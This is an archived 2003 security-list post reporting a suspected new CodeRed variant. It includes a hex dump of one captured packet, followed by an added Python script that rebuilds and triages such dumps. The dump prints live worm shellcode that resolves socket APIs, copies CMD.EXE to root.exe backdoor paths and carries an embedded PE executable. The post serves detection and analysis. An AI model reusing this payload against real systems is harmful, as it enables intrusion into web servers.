New CodeRed strain?

From: Frank Knobbe <fknobbe(at)knobbeits.com>
Date: Fri Apr 25 2003 - 14:55:13 EDT


Greetings,

we've been picking up some oddities since yesterday which look like a new CodeRed variant. Traditional signatures didn't identify it as such, but looking at the payload, it appears to be a CodeRed'ish type of bug. We're starting a trap for a complete session now. (So far we have only isolated packets.)

That isolated packet is below. I'll post the complete session once we catch the whole thing.

Has anyone else seen this?

Regards,
Frank

---8<---

04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0xD7D856CE  Ack: 0xF3E3078  Win: 0x4470  TcpLen: 20
00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43  ..u..U..E......C
6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55  loseHandle..u..U
F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74  ..E......_lcreat
00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F  ..u..U..E......_
6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8  lwrite..u..U..E.
E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC  ....._lclose..u.
FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79  .U..E......GetSy
73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89  stemTime..u..U..
45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C  E......WS2_32.DL
4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63  L..U..E......soc
6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00  ket..u..U..E....
00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75  ..closesocket..u
BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74  ..U..E......ioct
6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45  lsocket..u..U..E
A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75  ......connect..u
BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65  ..U..E......sele
63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00  ct..u..U..E.....
00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8  .send..u..U..E..
05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89  ....recv..u..U..
45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61  E......gethostna
6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00  me..u..U..E.....
00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF  .gethostbyname..
75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41  u..U..E......WSA
47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC  GetLastError..u.
FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33  .U..E......USER3
32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00  2.DLL..U..E.....
00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF  .ExitWindowsEx..
75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84  u..U..E...E.i...
08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1  ..@.E....xV4....
C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3  ........<.t.<.t.
C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1  ................
E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8  ................
E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF  ......... ......
FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF  ................
FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04  .............Y..
81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F  .#...#.X........
74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3  t....t.;.X...t..
68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D  h......\...P.U..
BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E  ..\........\CMD.
45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00  EXE.^.....cj....
00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72  ..d:\inetpub\scr
69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C  ipts\root.exe...
24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8  $....\...P.U.j..
2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C  +...d:\progra~1\
63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C  common~1\system\
4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B  MSADC\root.exe..
0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA  .$....\...P.U...
05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00  ....MZP.........
FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC  ............@...
00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C  ...........PE..L
01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0  ....*%).........
00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00  ................
00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00  ............ ...
00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00  .@..............
00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00  ............@...
04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00  ................
20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10   ...............
00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C  ............0...
01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10  ................
00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00  .......... ..`..
00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04  ........... ....
00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10  ..@.............
00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00  ...0............
00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC  ..........@.....
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68  ..........h....h
D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE  . @..a...... @..
00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8  . @.....j.h. @..
4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31  L........h.'...1
01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A  .....h.$@.h?...j
00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00  .h. @.h.....2...
0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68  ..u&j.hT @.j.j.h
48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF  H @..5.$@.......
35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68  5.$@......h.$@.h
3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80  ?...j.hX @.h....
E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C  .......uU.. @..L
00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68  ..... @..B...j.h
B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8  . @.j.j.h. @..5.
24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A  $@......j.h. @.j
01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99  .j.h. @..5.$@...
00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7  ....5.$@........
05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0  ..$@.....h.$@.h.
20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40   @.h.$@.j.U.5.$@
00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B  ..`.....uI..$@..
C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81  .t@.. @..>.t6Ff.
7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20  ~.,,u...217.... 
40 00 89 35                                      @..5

Received on Mon Apr 28 13:08:35 2003
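As an added example (not part of Frank's post), the following Python script does by machine what the post describes doing by eye: it rebuilds the raw bytes from a Snort-style hex dump, skips the packet header and any stray non-hex lines, pulls out the printable strings, and flags DOS "MZ" and "PE\0\0" signatures together with the COFF machine/section fields that follow them. That is enough to list which imports (socket, WS2_32.DLL), which file paths (…\MSADC\root.exe) and whether an embedded executable a payload carries, without running any of it. The sample rows are copied from the dump above; the header line is adapted with a documentation address (192.0.2.10) in place of the real source, and the function names are this example's own.

```python
"""Rebuild and triage a payload from a Snort-style hex dump (added example, not from the post)."""
import re
import string

# One dump row: up to 16 "HH" tokens, each followed by a space or end of line.
# The ASCII column to the right is ignored because it is re-derived from the bytes;
# capping at 16 tokens keeps a full row from swallowing a hex-looking ASCII column.
HEX_ROW = re.compile(r"^\s*((?:[0-9A-Fa-f]{2}(?: |$)){1,16})")
# Printable ASCII minus control whitespace, the same set the `strings` tool treats as text.
PRINTABLE = set(string.printable.encode("ascii")) - set(b"\t\n\r\x0b\x0c")
DLL_RE = re.compile(r"^[\w-]+\.dll$", re.IGNORECASE)

# Sample input: rows copied from the dump in the post; the header line is adapted with
# a documentation address (192.0.2.10) instead of the real source.
SAMPLE_DUMP = """\
04/25-17:44:56.268467 UTC 192.0.2.10:4699 -> x.x.x.x:80 TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0xD7D856CE  Ack: 0xF3E3078  Win: 0x4470  TcpLen: 20
45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C  E......WS2_32.DL
4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63  L..U..E......soc
6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00  ket..u..U..E....
4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B  MSADC\\root.exe..
05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00  ....MZP.........
FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC  ............@...
00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C  ...........PE..L
01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0  ....*%).........
"""


def parse_snort_hexdump(text):
    """Concatenate the bytes of every hex row in `text`.

    Packet headers, blank lines and page residue carry no leading hex column and are skipped.
    """
    payload = bytearray()
    for line in text.splitlines():
        m = HEX_ROW.match(line)
        if m:
            payload.extend(bytes.fromhex(m.group(1)))
    return bytes(payload)


def extract_strings(data, min_len=4):
    """Return runs of at least `min_len` printable bytes, like the `strings` utility."""
    found, run = [], bytearray()
    for b in data + b"\x00":  # the sentinel flushes a run that ends at the last byte
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    return found


def find_pe_headers(data):
    """Offsets of 'PE\\0\\0' signatures plus the COFF Machine and NumberOfSections fields."""
    headers = []
    for m in re.finditer(rb"PE\x00\x00", data):
        off = m.start()
        if off + 8 <= len(data):
            machine = int.from_bytes(data[off + 4:off + 6], "little")
            sections = int.from_bytes(data[off + 6:off + 8], "little")
            headers.append({"offset": off, "machine": machine, "sections": sections})
        else:
            headers.append({"offset": off})  # signature seen but header truncated
    return headers


def triage(text):
    """Summarise what a captured payload resolves: DLLs, paths, other strings, PE markers."""
    data = parse_snort_hexdump(text)
    strs = extract_strings(data)
    return {
        "bytes": len(data),
        "dlls": [s for s in strs if DLL_RE.match(s)],
        "paths": [s for s in strs if "\\" in s],
        "other_strings": [s for s in strs if not DLL_RE.match(s) and "\\" not in s],
        "mz_offsets": [m.start() for m in re.finditer(rb"MZ", data)],
        "pe_headers": find_pe_headers(data),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_DUMP).items():
        print(f"{key:14} {value}")
```

A lone "MZ" hit can be a coincidence in opaque bytes; the PE signature with a plausible Machine value (0x014C is i386) close behind it is what confirms an embedded executable. Feeding the script the full session capture, rather than the one isolated packet, is what would turn the import list into a complete picture of what the payload does on the host.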

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:04 EDT

